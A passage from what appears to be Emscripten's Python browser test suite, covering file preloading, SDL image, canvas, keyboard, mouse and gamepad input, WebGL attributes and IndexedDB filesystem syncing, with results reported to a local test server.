create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
@no_wasm_backend('This modifies JS code with regexes in such a way that does not currently work in WASM2JS')
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
